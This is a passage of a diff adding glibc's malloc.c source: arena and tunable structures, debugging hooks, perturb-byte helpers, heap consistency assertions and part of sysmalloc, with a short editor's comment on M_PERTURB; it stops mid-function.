+  /* Base of the topmost chunk -- not otherwise kept in a bin */
+  mchunkptr top;
+
+  /* The remainder from the most recent split of a small request */
+  mchunkptr last_remainder;
+
+  /* Normal bins packed as described above */
+  mchunkptr bins[NBINS * 2 - 2];
+
+  /* Bitmap of bins */
+  unsigned int binmap[BINMAPSIZE];
+
+  /* Linked list */
+  struct malloc_state *next;
+
+  /* Linked list for free arenas.  Access to this field is serialized
+     by free_list_lock in arena.c.  */
+  struct malloc_state *next_free;
+
+  /* Number of threads attached to this arena.  0 if the arena is on
+     the free list.  Access to this field is serialized by
+     free_list_lock in arena.c.  */
+  INTERNAL_SIZE_T attached_threads;
+
+  /* Memory allocated from the system in this arena.  */
+  INTERNAL_SIZE_T system_mem;
+  INTERNAL_SIZE_T max_system_mem;
+};
+
+struct malloc_par
+{
+  /* Tunable parameters */
+  unsigned long trim_threshold;
+  INTERNAL_SIZE_T top_pad;
+  INTERNAL_SIZE_T mmap_threshold;
+  INTERNAL_SIZE_T arena_test;
+  INTERNAL_SIZE_T arena_max;
+
+  /* Memory map support */
+  int n_mmaps;
+  int n_mmaps_max;
+  int max_n_mmaps;
+  /* the mmap_threshold is dynamic, until the user sets
+     it manually, at which point we need to disable any
+     dynamic behavior. */
+  int no_dyn_threshold;
+
+  /* Statistics */
+  INTERNAL_SIZE_T mmapped_mem;
+  INTERNAL_SIZE_T max_mmapped_mem;
+
+  /* First address handed out by MORECORE/sbrk.  */
+  char *sbrk_base;
+
+#if USE_TCACHE
+  /* Maximum number of buckets to use.  */
+  size_t tcache_bins;
+  size_t tcache_max_bytes;
+  /* Maximum number of chunks in each bucket.  */
+  size_t tcache_count;
+  /* Maximum number of chunks to remove from the unsorted list, which
+     aren't used to prefill the cache.  */
+  size_t tcache_unsorted_limit;
+#endif
+};
+
+/* There are several instances of this struct ("arenas") in this
+   malloc.  If you are adapting this malloc in a way that does NOT use
+   a static or mmapped malloc_state, you MUST explicitly zero-fill it
+   before using. This malloc relies on the property that malloc_state
+   is initialized to all zeroes (as is true of C statics).  */
+
+static struct malloc_state main_arena =
+{
+  .mutex = _LIBC_LOCK_INITIALIZER,
+  .next = &main_arena,
+  .attached_threads = 1
+};
+
+/* These variables are used for undumping support.  Chunks are marked
+   as using mmap, but we leave them alone if they fall into this
+   range.  NB: The chunk size for these chunks only includes the
+   initial size field (of SIZE_SZ bytes), there is no trailing size
+   field (unlike with regular mmapped chunks).  */
+static mchunkptr dumped_main_arena_start; /* Inclusive.  */
+static mchunkptr dumped_main_arena_end;   /* Exclusive.  */
+
+/* True if the pointer falls into the dumped arena.  Use this after
+   chunk_is_mmapped indicates a chunk is mmapped.  */
+#define DUMPED_MAIN_ARENA_CHUNK(p) \
+  ((p) >= dumped_main_arena_start && (p) < dumped_main_arena_end)
+
+/* There is only one instance of the malloc parameters.  */
+
+static struct malloc_par mp_ =
+{
+  .top_pad = DEFAULT_TOP_PAD,
+  .n_mmaps_max = DEFAULT_MMAP_MAX,
+  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
+  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
+#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
+  .arena_test = NARENAS_FROM_NCORES (1)
+#if USE_TCACHE
+  ,
+  .tcache_count = TCACHE_FILL_COUNT,
+  .tcache_bins = TCACHE_MAX_BINS,
+  .tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),
+  .tcache_unsorted_limit = 0 /* No limit.  */
+#endif
+};
+
+/*
+   Initialize a malloc_state struct.
+
+   This is called from ptmalloc_init () or from _int_new_arena ()
+   when creating a new arena.
+ */
+
+static void
+malloc_init_state (mstate av)
+{
+  int i;
+  mbinptr bin;
+
+  /* Establish circular links for normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      bin = bin_at (av, i);
+      bin->fd = bin->bk = bin;
+    }
+
+#if MORECORE_CONTIGUOUS
+  if (av != &main_arena)
+#endif
+  set_noncontiguous (av);
+  if (av == &main_arena)
+    set_max_fast (DEFAULT_MXFAST);
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  av->top = initial_top (av);
+}
+
+/*
+   Other internal utilities operating on mstates
+ */
+
+static void *sysmalloc (INTERNAL_SIZE_T, mstate);
+static int      systrim (size_t, mstate);
+static void     malloc_consolidate (mstate);
+
+
+/* -------------- Early definitions for debugging hooks ---------------- */
+
+/* Define and initialize the hook variables.  These weak definitions must
+   appear before any use of the variables in a function (arena.c uses one).  */
+#ifndef weak_variable
+/* In GNU libc we want the hook variables to be weak definitions to
+   avoid a problem with Emacs.  */
+# define weak_variable weak_function
+#endif
+
+/* Forward declarations.  */
+static void *malloc_hook_ini (size_t sz,
+                              const void *caller) __THROW;
+static void *realloc_hook_ini (void *ptr, size_t sz,
+                               const void *caller) __THROW;
+static void *memalign_hook_ini (size_t alignment, size_t sz,
+                                const void *caller) __THROW;
+
+#if HAVE_MALLOC_INIT_HOOK
+void weak_variable (*__malloc_initialize_hook) (void) = NULL;
+compat_symbol (libc, __malloc_initialize_hook,
+	       __malloc_initialize_hook, GLIBC_2_0);
+#endif
+
+void weak_variable (*__free_hook) (void *__ptr,
+                                   const void *) = NULL;
+void *weak_variable (*__malloc_hook)
+  (size_t __size, const void *) = malloc_hook_ini;
+void *weak_variable (*__realloc_hook)
+  (void *__ptr, size_t __size, const void *)
+  = realloc_hook_ini;
+void *weak_variable (*__memalign_hook)
+  (size_t __alignment, size_t __size, const void *)
+  = memalign_hook_ini;
+void weak_variable (*__after_morecore_hook) (void) = NULL;
+
+/* This function is called from the arena shutdown hook, to free the
+   thread cache (if it exists).  */
+static void tcache_thread_shutdown (void);
+
+/* ------------------ Testing support ----------------------------------*/
+
+static int perturb_byte;
+
+static void
+alloc_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte ^ 0xff, n);
+}
+
+static void
+free_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte, n);
+}
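+
+/* Editor's note -- usage sketch, not part of the original source: the
+   perturb byte is normally enabled via mallopt (M_PERTURB, value) or the
+   MALLOC_PERTURB_ environment variable, e.g.
+
+       mallopt (M_PERTURB, 0xaa);
+
+   after which new allocations are filled with value ^ 0xff and freed memory
+   with value, which helps flag reads of uninitialized or freed memory.  */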
+
+
+
+#include <stap-probe.h>
+
+/* ------------------- Support for multiple arenas -------------------- */
+#include "arena.c"
+
+/*
+   Debugging support
+
+   These routines make a number of assertions about the states
+   of data structures that should be true at all times. If any
+   are not true, it's very likely that a user program has somehow
+   trashed memory. (It's also possible that there is a coding error
+   in malloc. In which case, please report it!)
+ */
+
+#if !MALLOC_DEBUG
+
+# define check_chunk(A, P)
+# define check_free_chunk(A, P)
+# define check_inuse_chunk(A, P)
+# define check_remalloced_chunk(A, P, N)
+# define check_malloced_chunk(A, P, N)
+# define check_malloc_state(A)
+
+#else
+
+# define check_chunk(A, P)              do_check_chunk (A, P)
+# define check_free_chunk(A, P)         do_check_free_chunk (A, P)
+# define check_inuse_chunk(A, P)        do_check_inuse_chunk (A, P)
+# define check_remalloced_chunk(A, P, N) do_check_remalloced_chunk (A, P, N)
+# define check_malloced_chunk(A, P, N)   do_check_malloced_chunk (A, P, N)
+# define check_malloc_state(A)         do_check_malloc_state (A)
+
+/*
+   Properties of all chunks
+ */
+
+static void
+do_check_chunk (mstate av, mchunkptr p)
+{
+  unsigned long sz = chunksize (p);
+  /* min and max possible addresses assuming contiguous allocation */
+  char *max_address = (char *) (av->top) + chunksize (av->top);
+  char *min_address = max_address - av->system_mem;
+
+  if (!chunk_is_mmapped (p))
+    {
+      /* Has legal address ... */
+      if (p != av->top)
+        {
+          if (contiguous (av))
+            {
+              assert (((char *) p) >= min_address);
+              assert (((char *) p + sz) <= ((char *) (av->top)));
+            }
+        }
+      else
+        {
+          /* top size is always at least MINSIZE */
+          assert ((unsigned long) (sz) >= MINSIZE);
+          /* top predecessor always marked inuse */
+          assert (prev_inuse (p));
+        }
+    }
+  else if (!DUMPED_MAIN_ARENA_CHUNK (p))
+    {
+      /* address is outside main heap  */
+      if (contiguous (av) && av->top != initial_top (av))
+        {
+          assert (((char *) p) < min_address || ((char *) p) >= max_address);
+        }
+      /* chunk is page-aligned */
+      assert (((prev_size (p) + sz) & (GLRO (dl_pagesize) - 1)) == 0);
+      /* mem is aligned */
+      assert (aligned_OK (chunk2mem (p)));
+    }
+}
+
+/*
+   Properties of free chunks
+ */
+
+static void
+do_check_free_chunk (mstate av, mchunkptr p)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+  mchunkptr next = chunk_at_offset (p, sz);
+
+  do_check_chunk (av, p);
+
+  /* Chunk must claim to be free ... */
+  assert (!inuse (p));
+  assert (!chunk_is_mmapped (p));
+
+  /* Unless a special marker, must have OK fields */
+  if ((unsigned long) (sz) >= MINSIZE)
+    {
+      assert ((sz & MALLOC_ALIGN_MASK) == 0);
+      assert (aligned_OK (chunk2mem (p)));
+      /* ... matching footer field */
+      assert (prev_size (next_chunk (p)) == sz);
+      /* ... and is fully consolidated */
+      assert (prev_inuse (p));
+      assert (next == av->top || inuse (next));
+
+      /* ... and has minimally sane links */
+      assert (p->fd->bk == p);
+      assert (p->bk->fd == p);
+    }
+  else /* markers are always of size SIZE_SZ */
+    assert (sz == SIZE_SZ);
+}
+
+/*
+   Properties of inuse chunks
+ */
+
+static void
+do_check_inuse_chunk (mstate av, mchunkptr p)
+{
+  mchunkptr next;
+
+  do_check_chunk (av, p);
+
+  if (chunk_is_mmapped (p))
+    return; /* mmapped chunks have no next/prev */
+
+  /* Check whether it claims to be in use ... */
+  assert (inuse (p));
+
+  next = next_chunk (p);
+
+  /* ... and is surrounded by OK chunks.
+     Since more things can be checked with free chunks than inuse ones,
+     if an inuse chunk borders them and debug is on, it's worth doing them.
+   */
+  if (!prev_inuse (p))
+    {
+      /* Note that we cannot even look at prev unless it is not inuse */
+      mchunkptr prv = prev_chunk (p);
+      assert (next_chunk (prv) == p);
+      do_check_free_chunk (av, prv);
+    }
+
+  if (next == av->top)
+    {
+      assert (prev_inuse (next));
+      assert (chunksize (next) >= MINSIZE);
+    }
+  else if (!inuse (next))
+    do_check_free_chunk (av, next);
+}
+
+/*
+   Properties of chunks recycled from fastbins
+ */
+
+static void
+do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+
+  if (!chunk_is_mmapped (p))
+    {
+      assert (av == arena_for_chunk (p));
+      if (chunk_main_arena (p))
+        assert (av == &main_arena);
+      else
+        assert (av != &main_arena);
+    }
+
+  do_check_inuse_chunk (av, p);
+
+  /* Legal size ... */
+  assert ((sz & MALLOC_ALIGN_MASK) == 0);
+  assert ((unsigned long) (sz) >= MINSIZE);
+  /* ... and alignment */
+  assert (aligned_OK (chunk2mem (p)));
+  /* chunk is less than MINSIZE more than request */
+  assert ((long) (sz) - (long) (s) >= 0);
+  assert ((long) (sz) - (long) (s + MINSIZE) < 0);
+}
+
+/*
+   Properties of nonrecycled chunks at the point they are malloced
+ */
+
+static void
+do_check_malloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  /* same as recycled case ... */
+  do_check_remalloced_chunk (av, p, s);
+
+  /*
+     ... plus,  must obey implementation invariant that prev_inuse is
+     always true of any allocated chunk; i.e., that each allocated
+     chunk borders either a previously allocated and still in-use
+     chunk, or the base of its memory arena. This is ensured
+     by making all allocations from the `lowest' part of any found
+     chunk.  This does not necessarily hold however for chunks
+     recycled via fastbins.
+   */
+
+  assert (prev_inuse (p));
+}
+
+
+/*
+   Properties of malloc_state.
+
+   This may be useful for debugging malloc, as well as detecting user
+   programmer errors that somehow write into malloc_state.
+
+   If you are extending or experimenting with this malloc, you can
+   probably figure out how to hack this routine to print out or
+   display chunk addresses, sizes, bins, and other instrumentation.
+ */
+
+static void
+do_check_malloc_state (mstate av)
+{
+  int i;
+  mchunkptr p;
+  mchunkptr q;
+  mbinptr b;
+  unsigned int idx;
+  INTERNAL_SIZE_T size;
+  unsigned long total = 0;
+  int max_fast_bin;
+
+  /* internal size_t must be no wider than pointer type */
+  assert (sizeof (INTERNAL_SIZE_T) <= sizeof (char *));
+
+  /* alignment is a power of 2 */
+  assert ((MALLOC_ALIGNMENT & (MALLOC_ALIGNMENT - 1)) == 0);
+
+  /* Check the arena is initialized. */
+  assert (av->top != 0);
+
+  /* No memory has been allocated yet, so doing more tests is not possible.  */
+  if (av->top == initial_top (av))
+    return;
+
+  /* pagesize is a power of 2 */
+  assert (powerof2(GLRO (dl_pagesize)));
+
+  /* A contiguous main_arena is consistent with sbrk_base.  */
+  if (av == &main_arena && contiguous (av))
+    assert ((char *) mp_.sbrk_base + av->system_mem ==
+            (char *) av->top + chunksize (av->top));
+
+  /* properties of fastbins */
+
+  /* max_fast is in allowed range */
+  assert ((get_max_fast () & ~1) <= request2size (MAX_FAST_SIZE));
+
+  max_fast_bin = fastbin_index (get_max_fast ());
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      p = fastbin (av, i);
+
+      /* The following test can only be performed for the main arena.
+         While mallopt calls malloc_consolidate to get rid of all fast
+         bins (especially those larger than the new maximum) this does
+         only happen for the main arena.  Trying to do this for any
+         other arena would mean those arenas have to be locked and
+         malloc_consolidate be called for them.  This is excessive.  And
+         even if this is acceptable to somebody it still cannot solve
+         the problem completely since if the arena is locked a
+         concurrent malloc call might create a new arena which then
+         could use the newly invalid fast bins.  */
+
+      /* all bins past max_fast are empty */
+      if (av == &main_arena && i > max_fast_bin)
+        assert (p == 0);
+
+      while (p != 0)
+        {
+          /* each chunk claims to be inuse */
+          do_check_inuse_chunk (av, p);
+          total += chunksize (p);
+          /* chunk belongs in this bin */
+          assert (fastbin_index (chunksize (p)) == i);
+          p = p->fd;
+        }
+    }
+
+  /* check normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+
+      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
+      if (i >= 2)
+        {
+          unsigned int binbit = get_binmap (av, i);
+          int empty = last (b) == b;
+          if (!binbit)
+            assert (empty);
+          else if (!empty)
+            assert (binbit);
+        }
+
+      for (p = last (b); p != b; p = p->bk)
+        {
+          /* each chunk claims to be free */
+          do_check_free_chunk (av, p);
+          size = chunksize (p);
+          total += size;
+          if (i >= 2)
+            {
+              /* chunk belongs in bin */
+              idx = bin_index (size);
+              assert (idx == i);
+              /* lists are sorted */
+              assert (p->bk == b ||
+                      (unsigned long) chunksize (p->bk) >= (unsigned long) chunksize (p));
+
+              if (!in_smallbin_range (size))
+                {
+                  if (p->fd_nextsize != NULL)
+                    {
+                      if (p->fd_nextsize == p)
+                        assert (p->bk_nextsize == p);
+                      else
+                        {
+                          if (p->fd_nextsize == first (b))
+                            assert (chunksize (p) < chunksize (p->fd_nextsize));
+                          else
+                            assert (chunksize (p) > chunksize (p->fd_nextsize));
+
+                          if (p == first (b))
+                            assert (chunksize (p) > chunksize (p->bk_nextsize));
+                          else
+                            assert (chunksize (p) < chunksize (p->bk_nextsize));
+                        }
+                    }
+                  else
+                    assert (p->bk_nextsize == NULL);
+                }
+            }
+          else if (!in_smallbin_range (size))
+            assert (p->fd_nextsize == NULL && p->bk_nextsize == NULL);
+          /* chunk is followed by a legal chain of inuse chunks */
+          for (q = next_chunk (p);
+               (q != av->top && inuse (q) &&
+                (unsigned long) (chunksize (q)) >= MINSIZE);
+               q = next_chunk (q))
+            do_check_inuse_chunk (av, q);
+        }
+    }
+
+  /* top chunk is OK */
+  check_chunk (av, av->top);
+}
+#endif
+
+
+/* ----------------- Support for debugging hooks -------------------- */
+#include "hooks.c"
+
+
+/* ----------- Routines dealing with system allocation -------------- */
+
+/*
+   sysmalloc handles malloc cases requiring more memory from the system.
+   On entry, it is assumed that av->top does not have enough
+   space to service request for nb bytes, thus requiring that av->top
+   be extended or replaced.
+ */
+
+static void *
+sysmalloc (INTERNAL_SIZE_T nb, mstate av)
+{
+  mchunkptr old_top;              /* incoming value of av->top */
+  INTERNAL_SIZE_T old_size;       /* its size */
+  char *old_end;                  /* its end address */
+
+  long size;                      /* arg to first MORECORE or mmap call */
+  char *brk;                      /* return value from MORECORE */
+
+  long correction;                /* arg to 2nd MORECORE call */
+  char *snd_brk;                  /* 2nd return val */
+
+  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+  char *aligned_brk;              /* aligned offset into brk */
+
+  mchunkptr p;                    /* the allocated/returned chunk */
+  mchunkptr remainder;            /* remainder from allocation */
+  unsigned long remainder_size;   /* its size */
+
+
+  size_t pagesize = GLRO (dl_pagesize);
+  bool tried_mmap = false;
+
+
+  /*
+     If have mmap, and the request size meets the mmap threshold, and
+     the system supports mmap, and there are few enough currently
+     allocated mmapped regions, try to directly map this request
+     rather than expanding top.
+   */
+
+  if (av == NULL
+      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
+    {
+      char *mm;           /* return value from mmap call*/
+
+    try_mmap:
+      /*
+         Round up size to nearest page.  For mmapped chunks, the overhead
+         is one SIZE_SZ unit larger than for normal chunks, because there
+         is no following chunk whose prev_size field could be used.
+
+         See the front_misalign handling below; for glibc there is no
+         need for further alignments unless we have high alignment.
+       */
+      if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+      else
+        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
+      tried_mmap = true;
+
+      /* Don't try if size wraps around 0 */
+      if ((unsigned long) (size) > (unsigned long) (nb))
+        {
+          mm = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+          if (mm != MAP_FAILED)
+            {
+              /*
+                 The offset to the start of the mmapped region is stored
+                 in the prev_size field of the chunk. This allows us to adjust
+                 returned start address to meet alignment requirements here
+                 and in memalign(), and still be able to compute proper
+                 address argument for later munmap in free() and realloc().
+               */
+
+              if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                {
+                  /* For glibc, chunk2mem increases the address by 2*SIZE_SZ and
+                     MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap'ed area is page
+                     aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+                  assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+                  front_misalign = 0;
+                }
+              else
+                front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+              if (front_misalign > 0)
+                {
+                  correction = MALLOC_ALIGNMENT - front_misalign;
+                  p = (mchunkptr) (mm + correction);
+		  set_prev_size (p, correction);
+                  set_head (p, (size - correction) | IS_MMAPPED);
+                }
+              else
+                {
+                  p = (mchunkptr) mm;
+		  set_prev_size (p, 0);
+                  set_head (p, size | IS_MMAPPED);
+                }
+
+              /* update statistics */
+
+              int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
+              atomic_max (&mp_.max_n_mmaps, new);
+
+              unsigned long sum;
+              sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
+              atomic_max (&mp_.max_mmapped_mem, sum);
+
+              check_chunk (av, p);
+
+              return chunk2mem (p);
+            }
+        }
+    }
+
+  /* There are no usable arenas and mmap also failed.  */
+  if (av == NULL)
+    return 0;
+
+  /* Record incoming configuration of top */
+
+  old_top = av->top;
+  old_size = chunksize (old_top);
+  old_end = (char *) (chunk_at_offset (old_top, old_size));
+
+  brk = snd_brk = (char *) (MORECORE_FAILURE);
+
+  /*
+     If not the first time through, we require old_size to be
+     at least MINSIZE and to have prev_inuse set.
+   */
+
+  assert ((old_top == initial_top (av) && old_size == 0) ||
+          ((unsigned long) (old_size) >= MINSIZE &&
+           prev_inuse (old_top) &&
+           ((unsigned long) old_end & (pagesize - 1)) == 0));
+
+  /* Precondition: not enough current space to satisfy nb request */
+  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+
+
+  if (av != &main_arena)
+    {
+      heap_info *old_heap, *heap;
+      size_t old_heap_size;
+
+      /* First try to extend the current heap. */
+      old_heap = heap_for_ptr (old_top);
+      old_heap_size = old_heap->size;
+      if ((long) (MINSIZE + nb - old_size) > 0
+          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+        {
+          av->system_mem += old_heap->size - old_heap_size;
+          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+                    | PREV_INUSE);
+        }
+      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+        {
+          /* Use a newly allocated heap.  */
+          heap->ar_ptr = av;
+          heap->prev = old_heap;
+          av->system_mem += heap->size;
+          /* Set up the new top.  */
+          top (av) = chunk_at_offset (heap, sizeof (*heap));
+          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+
+          /* Setup fencepost and free the old top chunk with a multiple of
+             MALLOC_ALIGNMENT in size. */
+          /* The fencepost takes at least MINSIZE bytes, because it might
+             become the top chunk again later.  Note that a footer is set
+             up, too, although the chunk is marked in use. */
+          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
+          if (old_size >= MINSIZE)
+            {
+              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
+              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+              _int_free (av, old_top, 1);
+            }
+          else
+            {
+              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (old_top, (old_size + 2 * SIZE_SZ));
+            }
+        }
+      else if (!tried_mmap)
+        /* We can at least try to use mmap to get memory.  */
+        goto try_mmap;
+    }
+  else     /* av == main_arena */
+
+
+    { /* Request enough space for nb + pad + overhead */
+      size = nb + mp_.top_pad + MINSIZE;
+
+      /*
+         If contiguous, we can subtract out existing space that we hope to
+         combine with new space. We add it back later only if
+         we don't actually get contiguous space.
+       */
+
+      if (contiguous (av))
+        size -= old_size;
+
+      /*
+         Round to a multiple of page size.
+         If MORECORE is not contiguous, this ensures that we only call it
+         with whole-page arguments.  And if MORECORE is contiguous and
+         this is not first time through, this preserves page-alignment of
+         previous calls. Otherwise, we correct to page-align below.
+       */
+
+      size = ALIGN_UP (size, pagesize);
+
+      /*
+         Don't try to call MORECORE if argument is so big as to appear
+         negative. Note that since mmap takes size_t arg, it may succeed
+         below even if we cannot call MORECORE.
+       */
+
+      if (size > 0)
+        {
+          brk = (char *) (MORECORE (size));
+          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          /* Call the `morecore' hook if necessary.  */
+          void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+          if (__builtin_expect (hook != NULL, 0))
+            (*hook)();
+        }
+      else
+        {
+          /*
+             If have mmap, try using it as a backup when MORECORE fails or
+             cannot be used. This is worth doing on systems that have "holes" in
+             address space, so sbrk cannot extend to give contiguous space, but
+             space is available elsewhere.  Note that we ignore mmap max count
+             and threshold limits, since the space will not be used as a
+             segregated mmap region.
+           */
+
+          /* Cannot merge with old top, so add its size back in */
+          if (contiguous (av))
+            size = ALIGN_UP (size + old_size, pagesize);
+
+          /* If we are relying on mmap as backup, then use larger units */
+          if ((unsigned long) (size) < (unsigned long) (MMAP_AS_MORECORE_SIZE))
+            size = MMAP_AS_MORECORE_SIZE;
+
+          /* Don't try if size wraps around 0 */
+          if ((unsigned long) (size) > (unsigned long) (nb))
+            {
+              char *mbrk = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+              if (mbrk != MAP_FAILED)
+                {
+                  /* We do not need, and cannot use, another sbrk call to find end */
+                  brk = mbrk;
+                  snd_brk = brk + size;
+
+                  /*
+                     Record that we no longer have a contiguous sbrk region.
+                     After the first time mmap is used as backup, we do not
+                     ever rely on contiguous space since this could incorrectly
+                     bridge regions.
+                   */
+                  set_noncontiguous (av);
+                }
+            }
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          if (mp_.sbrk_base == 0)
+            mp_.sbrk_base = brk;
+          av->system_mem += size;
+
+          /*
+             If MORECORE extends previous space, we can likewise extend top size.
+           */
+
+          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+            set_head (old_top, (size + old_size) | PREV_INUSE);
+
+          else if (contiguous (av) && old_size && brk < old_end)
+	    /* Oops!  Someone else killed our space..  Can't touch anything.  */
+	    malloc_printerr ("break adjusted to free malloc space");
+
+          /*
+             Otherwise, make adjustments:
+
+           * If the first time through or noncontiguous, we need to call sbrk
+              just to find out where the end of memory lies.
+
+           * We need to ensure that all returned chunks from malloc will meet
+              MALLOC_ALIGNMENT
+
+           * If there was an intervening foreign sbrk, we need to adjust sbrk
+              request size to account for fact that we will not be able to
+              combine new space with existing space in old_top.
+
+           * Almost all systems internally allocate whole pages at a time, in
+              which case we might as well use the whole last page of request.
+              So we allocate enough more memory to hit a page boundary now,
+              which in turn causes future contiguous calls to page-align.
+           */
+
+          else
+            {
+              front_misalign = 0;
+              end_misalign = 0;
+              correction = 0;
+              aligned_brk = brk;
+
+              /* handle contiguous cases */
+              if (contiguous (av))
+                {
+                  /* Count foreign sbrk as system_mem.  */
+                  if (old_size)
+                    av->system_mem += brk - old_end;
+
+                  /* Guarantee alignment of first new chunk made from this space */
+
+                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                  if (front_misalign > 0)
+                    {
+                      /*
+                         Skip over some bytes to arrive at an aligned position.
+                         We don't need to specially mark these wasted front bytes.
+                         They will never be accessed anyway because
+                         prev_inuse of av->top (and any chunk created from its start)
+                         is always true after initialization.
+                       */
+
+                      correction = MALLOC_ALIGNMENT - front_misalign;
+                      aligned_brk += correction;
+                    }
+
+                  /*
+                     If this isn't adjacent to existing space, then we will not
+                     be able to merge with old_top space, so must add to 2nd request.
+                   */
+
+                  correction += old_size;
+
+                  /* Extend the end address to hit a page boundary */
+                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+
+                  assert (correction >= 0);
+                  snd_brk = (char *) (MORECORE (correction));
+
+                  /*
+                     If can't allocate correction, try to at least find out current
+                     brk.  It might be enough to proceed without failing.
+
+                     Note that if second sbrk did NOT fail, we assume that space
+                     is contiguous with first sbrk. This is a safe assumption unless
+                     program is multithreaded but doesn't use locks and a foreign sbrk
+                     occurred between our first and second calls.
+                   */
+
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      correction = 0;
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                  else
+                    {
+                      /* Call the `morecore' hook if necessary.  */
+                      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+                      if (__builtin_expect (hook != NULL, 0))
+                        (*hook)();
+                    }
+                }
+
+              /* handle non-contiguous cases */
+              else
+                {
+                  if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                    /* MORECORE/mmap must correctly align */
+                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+                  else
+                    {
+                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                      if (front_misalign > 0)
+                        {
+                          /*
+                             Skip over some bytes to arrive at an aligned position.
+                             We don't need to specially mark these wasted front bytes.
+                             They will never be accessed anyway because
+                             prev_inuse of av->top (and any chunk created from its start)
+                             is always true after initialization.
+                           */
+
+                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+                        }
+                    }
+
+                  /* Find out current end of memory */
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                }
+
+              /* Adjust top based on results of second sbrk */
+              if (snd_brk != (char *) (MORECORE_FAILURE))
+                {
+                  av->top = (mchunkptr) aligned_brk;
+                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+                  av->system_mem += correction;
+
+                  /*
+                     If not the first time through, we either have a
+                     gap due to foreign sbrk or a non-contiguous region.  Insert a
+                     double fencepost at old_top to prevent consolidation with space
+                     we don't own. These fenceposts are artificial chunks that are
+                     marked as inuse and are in any case too small to use.  We need
+                     two to make sizes and alignments work out.
+                   */
+
+                  if (old_size != 0)
+                    {
+                      /*
+                         Shrink old_top to insert fenceposts, keeping size a
+                         multiple of MALLOC_ALIGNMENT. We know there is at least
+                         enough space in old_top to do this.
+                       */
+                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
+                      set_head (old_top, old_size | PREV_INUSE);
+
+                      /*
+                         Note that the following assignments completely overwrite
+                         old_top when old_size was previously MINSIZE.  This is
+                         intentional. We need the fencepost, even if old_top otherwise gets
+                         lost.
+                       */
+		      set_head (chunk_at_offset (old_top, old_size),
+				(2 * SIZE_SZ) | PREV_INUSE);
+		      set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ),
+				(2 * SIZE_SZ) | PREV_INUSE);
+
+                      /* If possible, release the rest. */
+                      if (old_size >= MINSIZE)
+                        {
+                          _int_free (av, old_top, 1);
+                        }
+                    }
+                }
+            }
+        }
